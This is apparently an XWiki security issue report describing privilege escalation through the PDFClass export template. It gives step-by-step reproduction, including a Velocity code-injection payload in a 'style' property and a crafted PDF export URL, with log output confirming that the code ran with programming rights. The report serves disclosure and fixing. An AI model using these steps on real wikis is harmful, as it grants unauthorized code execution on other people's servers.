Privilege escalation (PR) from user registration through PDFClass

Steps to reproduce:

1. Register a new user account with username PDFClass.
2. Switch your user account to advanced.
3. Use the class editor on the user profile and create a new "TextArea" property with name "style". Set the content type to "Plain Text".
4. Use the object editor on the user profile and add a new object of PDFClass. Set the "style" attribute to $services.logging.getLogger('PDFClass').error("I got programming: $services.security.authorization.hasAccess('programming')").
5. Open <xwiki-server>/xwiki/bin/export/Main/WebHome?format=pdf&pdfcover=1&pdfcover=0&pdftoc=1&pdftoc=0&pdfheader=1&pdfheader=0&pdffooter=1&pdffooter=0&comments=0&attachments=0&pdftemplate=XWiki.PDFClass where <xwiki-server> is the URL of your XWiki installation.

Expected result:

No error is logged.

Actual result:

An error message

2023-09-21 10:38:47,090 [qtp2005169944-130 - http://localhost:8080/xwiki/bin/export/Main/WebHome?format=pdf&pdfcover=1&pdfcover=0&pdftoc=1&pdftoc=0&pdfheader=1&pdfheader=0&pdffooter=1&pdffooter=0&comments=0&attachments=0&pdftemplate=XWiki.PDFClass] ERROR PDFClass                       - I got programming: true

is logged, showing that we have executed Velocity code with programming right.

I put 14.10 as affects version but I'm sure the vulnerability is older.

The demonstrated attack only works when user registration is enabled. When user registration is disabled, the attack could still work but in this case it is necessary that the PDFClass has already been created by an admin (to customize PDF or office export as documented). In this case, start at step 3 and adjust the export URL accordingly to reference the page where you created the object.